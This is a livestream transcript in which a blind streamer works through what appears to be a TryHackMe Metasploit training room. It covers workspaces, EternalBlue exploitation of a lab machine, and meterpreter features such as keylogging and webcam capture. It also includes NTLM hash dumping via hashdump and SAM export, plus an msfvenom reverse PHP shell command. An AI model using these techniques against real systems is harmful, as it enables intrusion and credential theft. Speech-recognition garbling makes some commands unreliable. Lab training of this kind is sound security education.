there. It's cool. Okay, we got some logs here. So Particule de Dieu. Let me explain. Basically, I'm a blind hacker, a blind streamer. I have no vision. I can't see a thing. So I'm using a screen reader and a braille display to basically do what I do, and I stream things to indicate that that's possible and how that all works. So, you know, ask me anything, all that stuff. Yeah, so where were we? Okay, root, blah, blah, blah. Okay. You can now launch MSF console and check the database status. Oh, look at that. Dr. Sniper speaks French too. Wait, let's have a look. Let's have a little French pronunciation practice here. What did you say? Est-ce que tu le bot fait la traduction pour toi? Okay, very cool. I have not done French since like high school. You can now launch MSF console and check the database status using the db_status command. Lots of underscores in Ruby. Like Ruby uses underscores, Python does too. Python goes even more ham on it, and they call it snake case, so you don't put like the first capital word, like the first word, like small. Yeah, I saw it. And then you get like the camel case basically. Beep. In Python and sometimes in Ruby, although it's rare there, in Python you usually have like an underscore separating words instead, so you don't get the humps of like non-capital and then capital for every like linked up word. Yeah, and I can read French like pretty well. Like usually if people want to speak French, that's completely cool with me. Don't start insulting people in French or I'll have to ban you. But apart from that, you're fine. Speak whatever you want. So, see more about the database status. I don't think we're going to do much with the database in our little try hack me adventures. Like it says, it's really meant for like massive engagements where you also have a lot of different targets that you're going after, and it might be helpful to keep track of things. Let's see if it tells us what the database actually does. The database feature will allow you to create workspaces to isolate different projects. When first launched, you should be in the default workspace. You can list possible workspaces using the workspace command. So this is very similar to different like other tools that you will use in cybersecurity. Both Burp Suite and Zeproxy do this as well. Like just create a little workspace folder for your stuff. It's a good idea because you want to keep that stuff separate. Right now we only have default in this particular thing. Yeah, for example, Kaido I think does it too. Nessus I'm pretty sure does it too. You can add a workspace using the -a parameter or delete workspace using the D parameter. Sometimes it's just that simple, respectively. The screenshot below shows that a new workspace named Try Hack Me was created. Okay. Adding a workspace, you get a little like terminal, it just makes it, it tells you that it added. So what I like about MSF console and just Metasploit in general, it tends to be pretty verbose in telling you what it's doing. A lot of terminal commands will just like, you do a thing and just like get the prompt back, like, yep, I did it, I think. Just have to hope that I actually did it. Who knows? Just assume that we did it. Whereas like MSF console generally tells you, okay, yeah, I did the thing. Look, I was a good boy and did it. Look at me. Also, I'm amused that this still uses MSF5. If we look at our actual command line, where is it? Here. You'll see that we're actually on MSF6 on this. Let's actually go back to a blank shell. We don't use it. Up. There, we're back at a regular prompt now. No, it's just an old room. A lot of these, like, you make them once and they never get updated again. So that's why. Okay, yeah. So the asterisk indicate which one you're currently on. You will also notice that the new database name is printed in red, starting with an asterisk symbol. You can use the workspace command to navigate between workspaces simply by typing workspace followed by the desired workspace name. So yeah, I didn't see that it was marked in red. Accessibility tip, don't just do that with a color. I mean, there is people that are colorblind in here. There is people that can't even see color at all. Like, what? So, use different indicators here. They've done that well by also asterisk, like putting an asterisk. So yeah, use different things. Like put like a little indicator, an asterisk in this case, that says, okay, hey, this is the one you're currently on. Sometimes it's a greater than sign, sometimes it's a dash character. Just to put something, don't just turn it red. Yeah, so we see how the changing workspaces works. I guess we'll just get a question about what a workspace works. Just, hey, this is a workspace. How do we switch to it? Stuff like that. Because I don't think there's really all that much we can really do with these and try hack me, but hey, who knows? Hey, this one is 6. What the hell? Look, some of them were updated. So the previous one had MSF5 as the prompt, and this one has MSF6. Someone's being lazy and didn't do all the screenshots. That's kind of funny. So age for available options, pretty standard stuff. Oh, I should put my speech back so you guys can hear it. Hang on. There you go.
Speech mode talk. Workspace D name. Delete workspace. Workspace D delete all workspaces. Workspace R rename workspace. Workspace H show is help inform blank.
Yeah, blah, blah, blah. We don't need the rest of this. We just same thing. Different from regular Metasploit usage, once Metasploit is launched with a database, the help command, you will show the database backends commands menu. Okay. So yeah, that'll allow you to mess with the database. So what can we do? We got analyze, DB connect, DB disconnect, the whole thing. Basically, the idea is to store everything to do with a certain engagement in a workspace. And then when you start using a different workspace, you have a clean slate to work from. Sometimes, you'll set global options for various modules, and they can hang out in the workspace. And if you switch to a different workspace, you might not need those anymore. So they get wiped. So you have like a new thing to work from. And that, like for example here, you see that there's a DB import command which says import a scan result file. So you can actually have scan results be logged to your workspace. So then when you later get back to it, you have all your stuff just right there in that particular workspace, but only for that engagement. So it's really just sticking stuff in folders so you don't mix them up for the most part. What does this say? Rebuild cache, remove, save, all the things, status. Hosts, loot, for example, list all loot in the database. So loot is stuff you've exfiltrated. We haven't really played with these parts of Metasploit yet, but and notes, you can make notes as well in a workspace that you may not want. For example, important IPs or that works. That's a little bit more hardcore. Like yeah, you're right. That'll also split things up. This is just a little bit less extreme of a thing. Like in this case, you don't need to install Docker. You just have one database with different tables. And if you need all your workspaces, you can just export it. And if you just want one, you can just export the one workspace instead of just having it all mixed together. But yes, you could technically do this in Docker as well. No problem at all. If you run an nmap scan using the db_nmap shown below, all results will be saved to the database. So that's kind of cool. db nmap. So it's db nmap and then just what you'd normally do. So sv -p -10 10 12 229 is what they use here. And all the results are stored in this database, which I'm assuming you can then just retrieve somehow. What does it do? Like work group, blah, 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 BBB. Scroll past all this bit here. Yep. Map done. One map. And then what? You can now reach information relevant to the host name and services running on target systems with the hosts and services commands, respectively. So now if you do hosts, you'll get a little readout from the database that says, okay, we got this IP, it has a MAC address of this, it has this name, it has purpose, information, comments. So you get all this stuff. You can see what nmap found, and it just sort of notes it for you. There's web ways of doing this too, but this is just within Metasploit. You can just look it up. For example, we can see that 10 10 12 229 is on, it looks like an EU West 1.compute.internal server name. It has an unknown OS. We don't know what it does. And yeah, it just has all this stuff in here. And services tells you what host, what port, what protocol name, state information, so you can see if it's open or closed. And for example, we can see from the database that MSRPC is running on this host, Microsoft Windows RPC. So if we haven't gotten back to this, or we need to really quickly see, okay, what did we find in this engagement? You can just quickly look up the services command, and that's all your attack vectors neatly in the list. Very helpful. The host H and services H commands can help you become familiar with the available options, blah, blah, blah. Once the host information database, you can use the host-r command to add this value to the rhost parameter. That is cool. I did not know you could do that. So you can literally just, but what if you have multiple ones? How does that work? So you have, example workflow. Okay, we will use the vulnerability scanning module that finds potential MS17010 vulnerabilities with the use auxiliary/scanner/smb/smb underscore MS17_010 command. Okay. We set the rhost value using hosts-r. So rhosts, that's because there's an s at the end. You can put as many hosts as you like in there. So if you do hosts-r, you just take every hosts that we have in this workspace, stick them in rhosts, because that's going to be our targets. And yeah, we do try. Oh, we see all values were assigned correctly. In this example, 1010 is the IP address, blah, blah, blah. Yep, very cool. Once all parameters are set, we launch the exploit using the run or exploit command. Yep, fair enough. And it'll do the thing, blah, blah, blah. So we have a screenshot here where it shows we're back to MS5, amusingly. Okay. Yep, looks good. Blah, blah, blah. So what commands are we giving? We're saying, let me see.
10.10.12.2290.2:C:59 unknown device. Lang, roast equals greater 10.10.12.2229. Lang, MSF6 auxiliary, scanner/SMB.
Yeah, so if we do that, what we set are the host-r, it shows us, okay, this is the host we have. And then it also shows the assignment of the rhost parameter with that IP. Now we get all the things, looks good. We see that 10.10.12.229 got added. Very cool. And now we're going to exploit, I'm guessing. Yep, it just says run, but clear enough. If there's more than one host saved to the database, all IP addresses will be used when the host-r command is used. In a typical penetration testing engagement, we would have to following scenario.
Scanning these for further vulnerability. Finding available hosts using the decibels map command.
So dbn map, and then you use some kind of port scanning module or some other thing.
Used with the S parameter will allow you to search for specific services in the environment. Querying the database for services. MSF6 greater.
Okay, so you can do services -s and then netbios. And it'll show you all the things that it's found with that in there among your various nmaps that you did. So it's a quick way to just see, okay, what netbios vulns do we have that you can play with? In this case, we can see that apparently 10.10.12.229 has SMB running on TCP 139. And yeah, looks good. So that would be a potential attack vector. You can now look for vulnerabilities that might fit that particular thing.
You may want to look for low-hanging fruits such as
HTTP, yeah, blah, blah, FTP, SMB, SSH, all the usual stuff. Let me turn this off again. Pretty standard stuff. As you can see, Metasploit has many features to aid in engagements, such as the ability to compartmentalize your engagement into workspaces, analyze your results at a high level, and quickly import and export data. Answer the following questions. No answer needed. All right, well, whoop, we did it. Task 4, vulnerability scanning. Now we get to the fun stuff. Metasploit allows you to quickly identify some critical vulnerabilities that could be considered as low-hanging fruit. The term low-hanging fruit usually refers to easily identifiable and exploitable vulnerabilities that could potentially allow you to gain a foothold on a system and, in some cases, gain high-level privileges such as root or administrator. So low-hanging fruit is not just a cybersecurity term. You see it in accessibility, you see it in coding. It's just an easy win, basically. Like a low-hanging fruit is something that you can easily make use of or something you can easily fix if it's a bug. So yeah, it's easy, you know, long-hanging fruit. The idiom is like, okay, you can just reach up and snap it right off the branch. It's low-hanging. You can just get in there and do it. So finding vulnerabilities using Metasploit will rely heavily on your ability to scan and fingerprint the target. The better you are at these stages, the more options Metasploit may provide you. For example, if you identify a VNC service running on the target, you may use the search function on Metasploit to list useful modules. The results will contain payloads and post modules. At this stage, these results are not very useful as we have not discovered a potential exploit to use just yet. However, in the case of VNC, there are several scanner modules that we can use. Okay. Example, VNC scanning modules. So it does the search for. I'll use auxiliary / scanner / VNC. So there's VNC login. There's a couple ones here that shows off. You can use the info command for any module to have a better understanding of its use and purpose. VNC login scanner gets this little info. Let's have the computer read that.
Name, VNC authentication scanner. Module, auxiliary / scanner / VNC / VNC login. License, Metasploit framework license, BSD. Rank, normal. Lang, provided by Karstein. J-Duck. Karstein und J-Duck. Also, müssen wir mal ein bisschen Bratwurst holen gehen. Let's see, what else can we do? Basic options. What would we need for this? We would need blank passwords, the triad, brute force, speed, all the things. Turn the speech back off again because we have to scroll past all this stuff. User as pass. You'll be surprised how often that happens. People just use the username and password for the same thing. That is not always allowed. A lot of these like more stricter password like rules will not allow you to do that, but it does happen. This module will test the VNC servers on the range of machines and reports successful logins. Currently, it supports RFB protocol version 3.3, 3.7, 3.8, and 4.001 using the VNC challenge response authentication method. So you need to make sure that that's all there before this can work. They're showing this off because you can usually find that stuff out even before running this kind of tool, so you can just make sure this is even going to work. References, blah, blah, blah. You can learn a bit more about how it all works. Yeah. And that's it. What does it say? As you can see, the VNC underscore login module can help us find login details for the VNC service. Answer the questions below. Who wrote the module that allows us to check SMTP servers for open relay? All right, so now we have to go find that out. So let's have a look. Search SMTP. Let's just guess that it has the word SMTP open in there. So let's see what that spits out. Nothing. Okay, let's just do it with SMTP then. That's not too many. So this is actually faster with Braille. Oh, it's 3045. Okay, so it's a scan. Let's see. Oh, I don't care. Interact LAN 3034 auxiliary /scanner /http /wp easy wpsm 33.
What you gonna start from this top?
Exploit /linux 1 auxiliary /server /capture /smtp normal no authentication capture smtp 2 auxiliary /scanner /http /gavazm login root normal no car 3 exploit /unix 4 exploits 5 exploits 6 exploits 7 exploits 8 auxiliary /client /smtp /emailer normal no generic emailer smtp 9 exploits /linux 10 exploit slash 11 exploits 12 exploits 13 auxiliary slash DOS slash Windows slash SMTP slash milliseconds 06019 exchange 2004 11 12 normal no M 14 exploits slash 15 exploit 16 exploit 17 exploit 18 exploit 19 20 exploits 21 21 auxiliary slash scanner slash SMTP version normal no SMTP banner grabber
Version?
2 auxiliary slash scanner slash SMTP NTLM domain normal no SM 23 auxiliary slash scanner slash SMTP relay normal no SMTP open relay detection.
Here it is. So it's number 23 that we need to look at. Info 23. And we'll see that the offer for this is...
Provided by normal Campbell Murray. Existence less existence at 0x90.nl greater.
So it could be existence at OX90.nl, or it could be Campbell Murray. So let's see what many characters they want for this answer. Hello. Who wrote the module? So they want 2 words. So it's probably Campbell Murray.
Your answer is correct.
Look at that, we did it. We are super good at Metasploit. 41%. We're cruising through this room here, except not really. We're going pretty slow. Task 5, exploitation. This is the fun bit. This is where you break shit. Let's see. What do we got? Oh, new machine. That's nice. Start the machine. What? Okay, that's coming on. As the name suggests, Metasploit is an exploitation framework. Exploits are the most populated module category. Fair enough. So it shows this little readout of the version and how much of everything we have. We got 2,048 exploits in this, apparently. 1105 auxiliary and 344 okay. They got 562 payloads, a bunch of encoders, a bunch of NOPs, all the things. Evasion. There's a whole bunch of stuff in here that we don't necessarily need to know about right now. You can search exploit using the search command, obtain more information about the exploit using the info command, and launch the exploit using the exploit command. Well, the process itself is simple. Remember that a successful outcome depends on a thorough understanding of services running on the target system. All right, do we get to do stuff? Most of the exploits will have a preset default payload. However, you can always use the show payloads command to list other commands you can use with that specific exploit. Available payloads. So we can do that here. For example, they're doing it here on the SMB, MSF, and the Eternal Blue thing that we've seen before. And it shows us a list of payloads. What have we got? Again, they have numbers, so you can use those. So we got a generic custom, a shell bind TCP. We got a shell reverse TCP, which is usually what you would want, I'm guessing. We got Windows x64 exec. I'm guessing that runs PowerShell. Execute command, just CMD. Okay. Load library. So I guess for RCE, you got message box. Oh, that's fun. You can like send a little hello. Hello, I hacked your system. Oh no. Metasploit. That is your like reflective detection x64, Windows x64, IPv6, bind, TCP stat. Yep, all the stuff. And then anything else that's interesting? Yeah, just a bunch of different things. Metasploit for IPv6, all the things. Blah blah blah. Metasploit. Let's keep going here. Blah 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 blah. The Metasploit. Get to the chopper. Once you have decided on a payload, you can use the set payload command to make your choice. That's nice. This almost feels a bit like one of those MUDs that people sometimes still play. Like you just set all the command flags and then just run the command. It almost feels like hack MUD. It is quite that sort of user friendly in the sense that if you know what you're doing, it's very simple to do stuff with this. But yeah, it looks very like object-oriented MUD, like multi-user dungeon or something like that. Where you just space mud or whatever. I guess I'm showing my my interests and my proclivities right here. All right, so bum. Let me just make sure that we don't lose our attack box. Actually, let me just make sure that we add an extra hour to that. There. Done that. Very cool. Exploitation. Hey, miscellaneous. Windows. All right, so we're hacking the system here. We got our stuff. Let's go down here. All right. Oh shit. Motherfucker. There we go. Scroll back down because we had to press that button, so I need to figure out where we were. We were down here. Okay, let me just read this up. Yeah, metasploit, the stuff, did the thing. So yeah, like I said, you can choose a payload with its index, just like we did with the use number after a search command, which is nice. Makes it a lot less typey. And then after you've done all that, you can yeah, so what they say here is very true. Note that choosing a working payload could become a trial and error process due to environmental or OS restrictions such as firewall rules, antivirus, file writing, or the program performing the payload execution isn't available. For example, payload Python shell reverse TCP. Obviously would need Python on the target machine to make that work. Some payloads will open new parameters that you may need to set. Running the show options command once more can show them. Yeah, as you can see in the above example, the reverse payload will at least require you to set the lhost option. Like we did that in the previous room. Lhost sets your local machine, and you need that for an reverse shell pingback. Otherwise, it's not going to know where to reverse back to. Otherwise, well, you could get root and you'd never know. That'd be kind of sad. Yeah, setting the lhost value. We get an example of him doing that. Blah blah blah. Skibbity toilet. Blah blah blah. Sorry, I had to sneak that in there at some point. Got a whole entire like exploitation log happening here. I'm just gonna scroll past that because I'm going to assume we're going to be doing that ourselves in a moment. When the session is open, you can background it using Ctrl-Z or Control-Z, or abort it using Control-C. Backgrounding a session will be useful when working on more than one target simultaneously or on the same target with a different exploit and or shell. Backgrounding the session, yeah, it shows us off that like this person really likes giving multiple modalities for doing explanations. Like they'll tell you what to do and then they'll show you in a screenshot, or I guess a shell dump, which is nice in a sense that if you learn that way, it can be really helpful. It's also a lot of scrolling though, I will say that. Yeah, blah blah blah. Working with sessions. The sessions command will list all active sessions. The sessions command supports a number of options that will help you manage sessions better. Like this is like at this point, if I was the Try Hack Me room creator, I would probably leave these out for a bit later because you don't need these on Try Hack Me. Like Try Hack Me, you're mostly gonna work with one, maybe two targets at once, unless you're in like Wreath or something where you have like an entire network that you're working with, but that's not all that common, and not in this portion of the path. You're just not going to see it, so people are going to just gloss past this. As long as you know session one, you're mostly cool, and you can do some really cool stuff in this. You can send a command to a session, you can kill all sessions, you can search for them even with like the S flag. Run a command on the session given with I or all the things. Let's just scroll past this a little bit real quick. Yeah, you can put the entire alphabet in this and it'll just work fine. Yay! Super fantastic. Now let's see what else we can do here.
Many options allow specifying session ranges using commas and dashes. For example, sessions S check my 1, 3-5 or sessions K1-2, 5, 6. Blank. MSF6 exploit. You can interact with any existing session using the sessions I command followed by the session ID. Interacting with sessions. MSF6 blank. Active blank. MSF6.
So they showed us you can do sessions, gives you a list of sessions. They all have an ID. 1, 2, 3, 4, 5. And then you can, for example, say session-I1. And that will start an interaction with that open session and give you, in this case, a Windows prompt. So that is helpful. Deploy the target machine and answer the following questions. Here we go. Exploit one of the critical vulnerabilities on the target VM. Uh-oh. Well, this we can just complete because it says there's not actually a question they're asking, so we can just do that. What is the content of the flag.txt file? Now, this is going to be fun. What is the NTLM hash of the password of the user pirate? Damn, they're going all out all of a sudden, aren't they? Fuck. Okay, so target. We need target information. What's the target information? Oh, well, that sucks, doesn't it? Let's look for the word target. Because it's going to be a different IP. It's Metasploit scanning. That's not the one I want. I want the other one. Let's terminate this one, get rid of it. We don't need this one anymore. Yes, I'm sure. I'd like this one to disappear from my life. There we go. We'll go up. We'll go down. And, oh, well, that sucks. Okay, so apparently it didn't keep.
Task drop vote not vote up save vote vote drop click task correct answer task two correct and hit button correct and hit button task 3 the Metasploit database but task correct answer but task 4 vulner hit button correct answer hit task 5 exploitation region.
So what I'm doing right now is going by button.
Loading alert starting your machine. Please wait alert hooray.
I'm using it like the next button command in my screen reader to quickly skip past a whole bunch of part on the website. This is something you learn to do, like just sort of map out a website as you're using it. That way you can just figure out where the landmarks are, like literally and figuratively. In this case, the start machine thing is a button, so you can just quickly find it by just going button by button. Unfortunately, there is quite a few buttons on this page, so it still didn't go quite as fast as I'd like it to, but at least it's doing something, and it worked well enough. We're now bringing up the target that we're going to have to bash its skulls into. Do we have an IP yet? No, we have to wait 18 seconds for that. We can do that. 15, 14, 13, 12. Yeah, very nice. So they don't give us much to go off of. They just want us to exploit some kind of critical vuln in this particular machine that's now coming up and that just finished. It's 10.10, 143, 117. Let's set that as global rhost, so we have it. Set G rhosts this thing. So by setting this as global parameter, every module that I dump into context-wise should have this, and I can just use this without having to set it all the time. Now, given they keep mentioning Eternal Blue, I'm going to assume that that is vulnerable on this machine. So let's just try that. Let's do a search for Eternal Blue. Oh, hello phone. My cat's eating and my phone needs to tell me about that. Yeah, let's just try this first one. This number 0. Here we go.
No payload configured. Defaulting to Windows /x64/metaprinter/reverse TCP.
That's fine. That's what I was going to use anyway. I don't think we need to set anything. Let's just go. Exploit.
Exploit unknown command.
Exploit is hard to type.
Exploit started reverse. 10.10.143.117:445. Scanned 1 of 1 hosts. 100% complete.
Okay, are we getting anywhere? Sending all but last stage. Oh yeah, it's working. Nice. Metasploit. Nice. Help.
Core commands 13 equals command description.
So it's good to look at what Metasploit can actually do for you once you have a Metasploit shell. I just like saying Metasploit. It's fun to say. Time stomp. You can fuck with the time things.
Command description 24 equals.
I was lucky today. Yeah.
24 equals priv time lang hashnum dumps the command hashnum dumps the contents of the SAM database.
That might be helpful later for the NTLM question.
Lang 30 priv lang jet system attempt to elevate your privilege to that of local system.
I don't need local system yet. I just need a command for now. I just want the command line, so we can keep on. You can play audio to scare the user.
Webcams replay a video stream from the specified webcam.
You can look at their webcam. You can make a picture. Record the microphone. You can do some pretty nasty shit with this.
Control some of the user interface components. Set desktop, change the metaverter's current desktop. Screenshot, grab a screenshot, watch the mouse send mouse event. Key scan, stop capturing keystrokes.
So you can do a key logger from here. The person not being the wiser. Right now, we essentially can do so many bad things to this computer.
Command lang 30 stop lang sysinfo gets in for suspend to steal token shuts down the steal token attempts to steal an impersonation token from the target process. Shell drop into a system command shell. Grab 2 self calls revert to self on direct modify and reboots the PS list running.
Okay, so you can do all sorts of shit, but we just want a shell right now. So let's get a shell. So we now have Windows System 32. We need to find flag.txt. Is that in here? Let's see. What is it in England? What is it? Type flag.txt. Is that how it works? Typing is hard, and my cat's trying to break the door down. Oh no, no! Oh, my cat. All right. Flag.txt. Cannot find. Okay, so where is the flag? Does it tell us? Let's see. Flag. What's the content of the flag.txt? Okay, we need to go looking for it, I guess. So let's go see. It's not in System 32, which makes sense. Let's see if it's in local user. We can just go look at the users here. What do we got there? So this now we're actually hacking more like a capture the flag kind of thing. No files. We got only things here. Okay, so we got public, we got John, and we got default. Who am I? Who am I? We're system. Okay, interesting. Let's look in John. I'm assuming it's in John. Oop. I guess I don't have autocomplete. That's fair. I think we'd be root. Yeah, we are root. We don't even need to get system. We are root. So where is the stupid flag? Is it in public? There. No, don't look like it's in here. Okay, recorded TV. Ooh la la. We found the porn stash. All right, let's see what else is in here. Pictures. Yep. Custom. No, it's not in here. Unless I pick it in downloads, which I would find very silly. But let's have a look. Anything in here? No, nothing in here. Okay. No. All right, so it's not in here. What was it, John? There. See. Public. Oh, John without an H. Okay, that's why I keep fucking up. Yeah, let's see it. Is it in here? I keep wanting to do LS. It's not gonna work. Okay, we got... Usually they stick it on the desktop if you want to find a flag, so let's see if they did that here. Oh, you can't... I keep forgetting you can't autocomplete, so what? Desktop... Anything in here? No. Where the fuck is the flag? Huh. Documents? Oops. Oh, there's a file in here. There it is. I see it. We found the flag. Flag is T8. Hey, you. Seriously, let me read my stuff. Let's see. Yeah, so a whole thing. Yeah, you're not wrong. So THM 545554845 is the flag, which you'll just paste in here. There you go.
Your answer is correct. Try Acme Metasploit exploitation document 52%.
Okay, so now it wants something else. What is the NTLM hash of the password of the user pirate?
Answer format button, so button hint.
Can I have some information? No, I cannot have information. Fuck. Doesn't like dumping the SAM database get us that? It's really a long time since I messed with Windows hacking. Let me see. Let me Google that actually. I think there's just a command line tool that does it too. Yeah. Have some Dutch Google. I hope you like it. Fucking cookies. Alright, let's see. Windows. Dump NTLM hash of given user. Yeah, that's what I was wondering. If that would do that. We can try that. We can hash dump. I'm just gonna exit out of this. Go back here and do hash dump. Okay, yeah, that does seem to work. Cool. So I'm assuming this is an NTLM hash. I forget what they look like. Yeah, very nice. Ah, godverdomme. Look, my Dutch came out. Alright. Such a nice language to curse in, I must say. I'm guessing up to the... Do the colons count? I think they do. Yeah, I think they're padding, so we're keeping them in. Let's see if that's the right hash. I wouldn't know what other hash it would be, but you never know with this stuff. That one, that's an awfully long string. We're pasting it in. There's a space at the end. We'll remove that and we'll press the correct answer button and hope and pray. Uh-oh, it's wrong. Why is it wrong? What did I miss? Without the colons, maybe? Let's try that. Or this is not the right hash.
Try Acme Metasploit exploitation document. Answer format. Try Acme Metasploit.
Let's see.
Colon.
Remove the colon. Okay, let's go.
Your answer is incorrect.
No, so that is not the hash they want.
Answer format 32. What is the NTLM hash of the password of the user?
Interesting. I was pretty sure that was gonna work. Interesting.
Brute force Windows Server SMB.
Oh, close.
Try Acme Meta.
All right. Well, let's DuckDuckGo this. There must be a simple way to do it. Probably like a PowerShell command or something that you can use for this. Let's see. Dump NTLM hash for given user.
Dump NT. Click of link Gitbook. Link heading level 3 or 3 Windows hashes. Cheat sheet. Gitbook.
Oh, look, cheat sheet. Perfect. It's exactly what I needed. Let's see.
This page deals with heading
Yeah.
level 2, link direct link to heading. Heading level 2 introduction.
Yep. Let's see.
Heading level 2 or 3 NTLM hash.
Here we go.
NTLM hashes are composed of 2 parts. LM hash, turned off since Windows Vista /Windows 2008. NT hash, can't be lonely, it stays NTLM hash. Unlabeled graphic click of caption NTLM hash. Out of caption NTLM hashes are stored in the SAM database on the machine or on domain controller's NTDS database.
Oh, so we got the right stuff.
Let's see common techniques to retrieve a heading level 4 link direct link to heading.
Did I just not get the whole thing?
Pirate 1000 Metacritter greater. Pirate 1001 odd 3 met left Pirate space Metacritter Pirate 1 I.
No, that looks right. Weird.
Retrieve Windows at heading level 4 dumping SAM database manually. First, get a copy of SAM security and system files. Button copy. C. Greater reg dot x save HKLM sam C. Temp sam dot save C. Greater reg dot x save HKLM sys and retrieve NTLM hashes with secretum from implicate. Button copy. Dollar secrets.
That feels a bit much.
Star dump guest poll support. Heading level 4 link direct link to heading level 4 retrieve and crack NTLM hashes with Metasploit. On local machines, simply use smart hash them. Button copy. Metasploit greater run post slash windows slash gather slash smart hash them.
Oh. Okay.
Run post
Well, let's try that.
run post slash on domain controllers. 2 ways to retrieve domain users NTL. Root at 10 dash root at
We got a thing that we can run here.
pirate colon 1001 Metasploit greater bottom met 1F.
See what that does. It is, but that would crack the hash, and we don't need to crack. We don't even need to crack it. We just need the actual NTLM, which I thought we had, but apparently we did not. So let's try it this way.
Star running module against John PC. Star hashes will be saved to the database if one is connected. Plus hashes will be saved in Luton JTR pass.
Okay.
Plus pirate colon 1001 plus right to space pirate IRATE colon 1.
I think this is the same thing, but
001 colon E3 ACE
yeah, it looks awfully similar to me.
04 FOB 875 colon space.
I don't know. All right, let's try this again.
1001 retrieve Windows.
Maybe it's very slightly different, like that one character that we missed or something weird like that. Let's see.
Answer format. 14 star edit unavailable THM answer. And 1001 paste 1001 blank.
Yeah, this is the exact same string. Happy now?
Alert! Oh, your answer is incorrect.
Why? What are you missing, my dude?
What is the NTLM hash of the password of the user?
This is exactly what you're asking for. Why are you being so difficult? That is very strange.
Out of region button collapsed. Task button submit.
Huh.
Speech mode off.
Any ideas? This looks like literally exactly what it's meant to be doing. Maybe? that could be. Maybe they don't want the LM hash.
Speech submit button. Alert! Oh, your answer is in answer format.
No, but then if we move that, they may also not want the colons at the end. Let's remove that. Happy now?
Submit. Button submit. Answer format. Button submit. Alert! Oh, your answer is in
No, that's not it either. What the fuck? Huh.
D3. What is the NTLM hash of the password of the user pirate? Answer format. 32 star edit odd 3 D4.
Okay, so we need 32 characters. How many do we got here? 1, 2, 3, 4. Many more than 32. Okay.
A D3B 435B 51404 A D3B 435B 51404 E colon.
Ah. They just want that first part, I think. Or the latter part, because I think that's 32 characters as well. So let's let's cut this. Let's see if they want this one. I think they might want the second one. Let's try this.
Alert! Oh, your answer is incorrect.
Yeah, that's what I figured. So let's remove. Hold for Doma. Let's remove this. Go here. Hey, damn it. Go here. Put that in. Take away the colon. And does it want this? There you go. That was extremely unclearly exposed. Like, don't tell me that. Well, there you go. It's fixed. It did it. Let's see. Do we do MSF Venom for today? It shouldn't take super long. Let's see. That was dumb. That made me seriously like wonder what the hell's happening. I don't understand. Oh shit! Broke my brill. I broke my brill. All the things are firing. I did get it. I did do it. Uh-oh. Oh, the cable is not. No. This is a house of cards. My computer setup is a house of cards. Look like there's like hubs connected to computer ports, and sometimes they fall down. There we go. Okay. Is this the last task? That's mean. Why'd you do that for? Yeah, so let's finish this room and then call it for the day. Watch this be like the most super long version. Alright, let's turn this machine off. We don't need it anymore.
Button. One toggle main save room button. Vote up button. Vote down. Drop down menu. Copy button. Button. Collab. Add 1 hour button. Terminate button. Terminate. Are you sure you want to terminate this machine? Content.
Yep. I am quite sure. Goodbye.
Clickable banner landmark main navigation landmark.
Then we go to that's task 6 thing here. Boom. Open that up. Start the new machine while I read this new stuff. So, MSF Venom, which replaced MSF Payload and MSF Encode, allows you to generate payloads. It makes viruses, essentially. MSF Venom will allow you to access all payloads available in the Metasploit framework. MSF Venom allows you to create payloads in many different formats: PHP, EXE, DLL, ELF, etc. and for many different target systems: Apple, Windows, Android, Linux, etc. MSF Venom payloads. Yeah, okay, MSF Venom-L. So you don't do this from within Metasploit. You do this from the actual, just regular shell. Looks like in this particular case, they have 562 payloads that you can use. Yeah, boo, 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 boo. Ba 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 ba. This is actually kind of interesting because this gets very close to what I was talking about the other time about weaponizing a screen reader. This comes awfully close to that very simple, like very similar concept where you just sneak a file onto a system that then becomes that system's anathema. Let's see. You can either generate standalone payloads, for example, a Windows executable for Metasploit, or get a usable raw format, etc. Python. The MSF Venom --list format command can be used to list supported output formats. Yeah, and we're gonna see that, of course. Encoders. Contrary to some beliefs, encoders do not aim to bypass
Connected to control server.
to bypass antivirus installed on the target system. As the name suggests, they encode the payload. While it can be effective against some antivirus software, using modern obfuscation techniques or learning methods to inject shellcode is a better solution to the problem. I really want to learn that at some point, like properly do shellcode. I'm just not a C programmer at all, so ugh. The example below shows the usage of encoding the E parameter. The PHP version of Metasploit is included in a base 64 and the output format was raw. Okay, fair enough. So yeah, it shows us down there. Basically it's msf-p php / metasploit / reverse _ TCP, localhost equals IP, -f raw -e php / base 64, which, you know, self-explanatory for the most part. Okay, blah, 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 blah. Yep, puts all the stuff in there. Very cool. Gives you a payload that I guess you'd have to copy paste into a file at this point, or how does it do it? Okay, I'll read that, thank you. Similar to exploits using a reverse shell, you will need to be able to accept incoming connections generated by the MSF Venom payload. When using an exploit module, this part is automatically handled by the exploit module. You will remember how the payload options appeared with setting a reverse shell. The term commonly used to receive a connection from a target is catching a shell. Reverse shells, or Metasploit callbacks, generated in your MSF Venom payload can be easily caught using a handler, usually Netcat, I'm guessing. The following scenario may be familiar. We will exploit the file upload vulnerability present in DVWA, Damn Vulnerable Web Application. For the exercise in this task, you will need to replicate a similar scenario on another target system. DVWA was used here for illustration purposes. The exploit steps are: generate the PHP shell using MSC Venom. Yeah. Start the Metasploit handler. Execute the PHP shell. MSF Venom will require a payload, the local machine IP address, and the local port to which the payload will connect. Seen below, 10.02.19 is the IP address of the attack box used in the attack, and local port 7777 was chosen. Generating, So we're probably gonna have to do a very similar thing. So I'm just going to sneaky copy this command: msf venom -p php/reverse_php lhost equals whatever that is. Port 7777-f raw greater than sign reverse shell.php. So if you don't put that last bit, it's just going to literally spam it to the command to the std out, which will work, but is a little off. I was talking and I also restarted my headset because it crashed on me. Look at me multitasking. Okay, yeah, so it shows us what to do. No encoder specified. Outputting raw payload. Fine. Please note, the output PHP file will miss the starting PHP tag commented at the end. Commented and the end tag $greater than as seen below. Okay, the reverse shell PHP file should be edited to convert it into a working PHP file. Below, comments removed from the beginning of the file. Okay, yeah, so they come defanged by default, which is probably a good idea. Oh, look, these are actually screenshots, so we cannot see these screenshots. They don't have alt text. So that's kind of meh if you don't actually know what you're looking for. They could have easily just shown you the lines, although I'm a little bit lenient here because they did pretty much exactly tell you what you're meant to be changing, albeit with a little bit sort of obscure language. Like, you need to know what a comment is and you need to know what those tags mean. But yeah, it will use multi-handler to receive the incoming connection. The module can be used with the use exploit/multi/handler command. Multi-handler supports all Metasploit payloads and can be used for Metasploit as well as regular shells. So it's netcat, but better. To use the module, you'll need to set the payload value, php/reverse_php in this case. The lhost and lport values. Okay, yeah, easy enough. Okay, blah, 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 module options, blah, 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 blah. And yeah, weaponizing screen readers and like trying to get RC on the screen reader. I would actually be really amused if you managed that, 